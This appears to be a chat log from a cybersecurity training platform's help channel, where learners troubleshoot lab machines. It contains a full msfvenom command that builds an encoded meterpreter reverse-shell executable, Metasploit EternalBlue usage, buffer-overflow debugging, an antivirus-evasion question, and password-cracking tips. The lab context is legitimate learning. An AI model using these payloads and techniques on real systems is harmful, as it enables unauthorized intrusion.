Thank you @fierce kettle I was able to get it resolved by changing my vpn location. Appreciate the note.
Can anyone give me a pointer on the vulnversity privesc? I can't seem to write a module without echoing line by line due to the shell, which then ignores quotes and screws up my reverse shell
@slender jasper try creating the file locally then uploading it
i fixed it
Can anyone tell me how I can optimize Hydra so that it would go through the password list slightly faster? I know thread count is one thing, but are there any others like GPU acceleration or something?
Hydra is working remotely, so the speed is down to the server really @chrome palm
Ah, I understand; so besides choosing the thread count, I can't do much?
Also, does anyone actually use GPU acceleration when possible on Kali?
Correct.
In terms of GPU acceleration, if it's on a VM it doesn't actually have access to your GPU unless you pass it through -- which is a pain by all accounts.
I have it physically installed
Since I do a lot of portable work and I don't mind using Debian on the go, I chose Kali as daily driver on my laptop, and well, I was curious whether I can use the GPU on it for anything special
Sure. Things like hash cracking go a lot faster using your GPU
Hashcat is the big GPU user when it comes to hacking
Okay, I'll get on that. Seems like a better option than John tbh
Oh yeah
My preference is for Hashcat myself
There are things that John does better
But Hashcat bare metal is awesome
Isn't JTR CPU-accelerated if I recall correctly?
JTR works off your CPU, yes
Hashcat is designed to work off your GPU. It can run on your CPU, but it's not advisable.
Heck, we have one of its developers in here
He frequently recommends against forcing it on CPU
who's that lol @chrome valve
Solved brainstorm
I need help on steel mountain. I've followed 3 independent guides, literally keystroke for keystroke, and I cannot get the service to throw a shell back to my nc listener
have you tried resetting the room?
10+ times
ahhhh, I have forgotten my THM password so I can't help so much rn lol
are you using metasploit?
No, i like the hard route
what do you mean hard route? There's no difference except how you craft the payload. What payload are you using to get back the shell
No metasploit / meterpreter. I've tried 3 different payloads, and varied the ports in case there's a host firewall
followed this exactly, except for IP orc: https://www.youtube.com/watch?v=mf1sRybj6Sk
name it advanced.exe that what I know worked for me
Then just stop and start the service again and get nc up; it's going to take about a minute to get back a shell
Have you tried my guide on the site? It covers the non-metasploit route pretty heavily.
Almost to the keystroke. But like Cryillic said, proper placement and sc stop/start is what matters here.
I am stuck at Anthem's reverse shell, wherein I am trying to download the nishang PS reverse TCP and it's getting detected by antivirus... any hint to bypass it?
You are massively overcomplicating that box...
Ok... let me try by uploading nc and executing it
Thanx...done with box
Why do simple when you can do hard?
Hey, I am running into an issue with Brainstorm. I am trying to FTP into the server and once I log in as anonymous it will not let me ls the files. I made sure my firewall is off and tried running it in passive mode but no luck. Any clue?
ftp> ls
501 Server cannot accept argument.
ftp: bind: Address already in use
ftp>
Hi everyone! Still new to discord chats so let me know if I should be asking this somewhere else. I have been working on Blue room and for the life of me I can't get the exploit working. The recommendation was to reboot the VM if the exploit fails. I have already rebooted the VM about 6 times. Any hints?
are you talking about getting initial access?
yes.
what exploit are you running and are you making sure to set the rhost and all that good stuff?
exploit/windows/smb/ms17_010_eternalblue
set rhost <ip> then run but this keeps failing after multiple reboots of the machine
@wet sierra thanks!
@rustic hill just ran it to test and it works fine for me. Maybe try updating everything? Also check to see if your vpn is still connected.
Sorry if I am not being much help, I am still pretty new myself.
thanks @zealous swallow let me give this a couple more tries after an update.
oh wow! it worked! until last time, I had the VPN connection from host and was firing msfconsole from a kali VM. initiated the vpn connection from kali linux and worked on first try. I wonder if this is an actual thing or I got lucky.
Well either way congrats!
thanks! and thanks for the help!
But I am pretty sure that is how it has to work, if you are using a VM the VPN has to be connected on the VM and no problem at all, goodluck!
Blue can be done without msfconsole, using worawit's files
is the Jenkins machine broken? I can't see a flag in the location where there should be a flag
*Alfred sorry not Jenkins
Alfred is working fine.
hello, I'm doing brainpan 1 and I'm creating my reverse shell exploit and it all looks good to me but it just crashes the server and doesn't open a reverse shell. I actually looked up a walkthrough and the code is the exact same but mine crashes the server whereas in the walkthrough they are able to open a reverse shell. Has anyone had this problem before with this box?
as well as for brainstorm, my local reverse shell works but the remote one does not (I changed the IPs and connected to the VPN)
@dense root you can Pm me i can help
hi everyone
can I ask a question about Alfred
about Switching Shells section
I dont get it
I crafted msfvenom payload
downloaded it on the server
no
secondly I started msfconsole handler on 4444
then I downloaded payload
but I lost the previous connection
and now I don't have a shell
can anyone help me with advice?
okay only issue is with Start-Process
does it need to be like powershell Start-Process "shellname.exe" ?
that walkthrough is kinda
...
maybe I need to remove " "
let me try
C:\Program Files (x86)\Jenkins\workspace\project>Start-Process shell.exe
'Start-Process' is not recognized as an internal or external command,
operable program or batch file.
PS C:> Start-Process <String>
probably I need to begin with powershell
lol
it has to be like
powershell "(Start-Process 'shell.exe')" ?
@here
anyone
hate this roooom
Start-Process "shell-name.exe"
'Start-Process' is not recognized as an internal or external command,
operable program or batch file.
no reverse shell
if Start-Process isn't recognized then you're not calling it from powershell
@cloud rain
C:\Program Files (x86)\Jenkins\workspace\project>powershell "Start-Process 'shell.exe'" it just finished successfully and no back connect to the multi handler
what could be issue?
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.11.3.26 LPORT=4444 -f exe -o shell.exe
powershell -c "Start-Process 'shell.exe'"?
Started reverse TCP handler on 10.11.3.26:4444
no without -c, let me google why with -c
I tried -Command
is it the same as -c?
no, still nothing happens
Double check the IP address
Why not just run it from the command line? I know what the guide says, but Powershell is wonky sometimes. Just run the executable as normal to see if it works.
Note to self: ||loading all commands at once in Jenkins, even with listeners set, doesn't seem to work for me||
Can I ask someone a question about Corp?
Interesting ... OSCP learning paths is now this room. Just curious. What was the reason for the name change?
Its scope isn't limited specifically to the OSCP
guys I'm starting to learn Linux and the 4th task says log in with putty or ssh with user shiba1 with the same password, but it's coming back with Permission Denied. Does that sound like a wrong password issue?
I've tried both putty and ssh
@rancid vine Sorry, didn't receive the notification; I tried everything and the steps you advised as well
@fiery beacon Can you screenshot?
You're trying to SSH into the Kali machine -- not the target
Try using the IP address for the Learn Linux VM
And do it inside the kali machine, rather than in your own PuTTY
No need for PuTTY when you have Kali
@fiery beacon I believe you were typing the name and password wrong too. Try looking at it closely again.
what if you receive a "connection has timed out"?
We need more information than this in order to help Jinketh.
hi, I am working on brainstorm and my script looks to be correctly written, although I am not getting the results I'm expecting in Immunity. Tried with OllyDbg too and got very similar results.
Can you share it here please? Screenshot is fine Alger.
Remember that Brainstorm needs a carriage return to function properly.
I have a different EIP
the script I used https://pastebin.com/ai6fxfw2 and this is what happens in Immunity
gatekeeper worked as expected, the example Heath did in PEH worked as expected, this is the first time I've hit an issue.
tried with the second address mona found, too. no luck there either.
Oddly enough my script that I did it with originally isn't working.
I'm definitely crashing the room. It's completely unresponsive.
I had this problem yesterday, sometimes it would crash the room and then I'd reboot the box and it'd sometimes work, so I think the box is just buggy @rancid vine @glacial bobcat
I agree. I'm going to submit a bug report on it. Thanks for the feedback.
no problem. If you've done it already could you check Brainpan1 as well? I looked at walkthroughs and my payload is the same, but it just crashes the server so I think there's a bug in that one too
but I don't want to submit it unless someone smarter than me double checks
I spent a whole day stressing over it, so it's not you haha
Mayor, do you know of a Linux equivalent of mona modules, where basically you would do the same process in gdb as you do in Immunity Debugger?
or anyone
I don't.
I looked for something for OllyDBG, but it's so old that the plugin support is hard to find.
I have an exe that I can find ESPs and other addresses with that I run with wine. Works well enough.
gotcha, so you use that to do the module-finding & JMP-finding part of BOFs?
is there anything else you know of/recommend, or any process you know of for gdb (or anything people use for linux servers)?
Can use it, yea. I've not used anything except Olly on Linux. And it leaves a lot to be desired.
Cool, thanks!
Followed up in #site-support. Didn't get much of a response. Fingers crossed it gets fixed soon. I would love to complete this path...
Anyone have time for a quick sanity check on Brainpan?
Has anyone attempted the oscp after taking this path with success?
@gentle glade read up on the scrollback. I think it's experiencing an issue.
I need a hint on Corp. Task 3 - #3 - hashcat isn't on the Corp box. so like, wtf. I can't copy/paste to/from the box.... am I really supposed to type that hash output character for character into a file on my kali box?
surely no way, right?
(tried logging in with WinRM, because obviously that'd be way easier, but no luck there either)
Rdp right? Try using a client that allows for clipboard syncing (xfreerdp and remmina have that iirc)
tried
winrm would make this so much more enjoyable.
idk why that's not the path.
this is incredibly frustrating. thankfully I found a walkthrough with the hash pasted for our reference. if anyone hits the same issue DM me, I will gladly share if you can't find it on your own.
I think I control C'd it for some reason using xfreerdp.
nice. didn't work here.
can anyone list out BOF and Windows priv esc room names?
That's not really a question meant for this channel. And we have to go research all of those rooms for you with a question like this.
Gatekeeper, Brainpan, Brainstorm are Windows BOF rooms. Every Windows machine on the platform has some sort of privesc. There's even a Windows Privesc Room.
need some help with alfred room task 2
so ask away and if someone can help you they will
sure
Uh, no
ok buddy
K
Yo anyone here up for some bug bounties?
Wrong channel that would be #cyber-and-careers or #general
I'm not able to make an accurate script for CICADA-3301 book cipher decoding..
can anybody help?
I'm not sure this is related to a TryHackMe room is it?
ya, there's a room, kind of a clone of Cicada.
yes it is, but please put it in #room-help also. Because I'm writing anyways: you don't need a script unless you really need one, you can easily do it by hand
how good are THM rooms (boxes) compared to HTB?
THM and HTB are fundamentally different and have different approaches
Yes, most of THM boxes are really good
HTB isn't bad either, they have pretty awesome boxes
Yea, it's just a matter of preference, environment, etc. I prefer THM because it's a learning platform, but I've started dabbling on HTB more now that I'm comfortable with my knowledge base.
hey @rancid vine, follow up on brainpan from yesterday:
This pic shows the return address I'm writing over the EIP with: ||311712F3||
This shows that that memory address is a JMP ESP as expected
The payload I'm using (I'm doing it locally, hence the 192 IP)
and the full exploit
which just crashes the server; I have tried with a windows payload as well; as well as encoding the payload (but it does that automatically anyway)
tried with staged and unstaged as well, but still no luck
is there something that I'm missing?
I'll take a look when I get home
So it looks like you're trying to connect locally, which I am assuming you're using a Windows lab machine to do so. Keep in mind you need a Windows payload if you're doing that. Confirm that it works, and then change your payload to a Linux payload when you run the actual exploit against the brainpan machine.
still crashes the server locally & no shell
@rancid vine
just tried a staged and unstaged payload (windows/shell_reverse_tcp & windows/shell/reverse_tcp), with the same script i sent above (replacing the shellcode) and still crashes the server, no shell
Maybe get rid of all the b's that you have in the shellcode, and in your exploit
I usually remove those when I have to use Python
same problem (server crashing, no shell) with the b's removed
Is the firewall disabled?
yes, and I was also able to get a shell on gatekeeper, as well as brainstorm locally (tested just now) so I don't think it's a configuration issue
Found it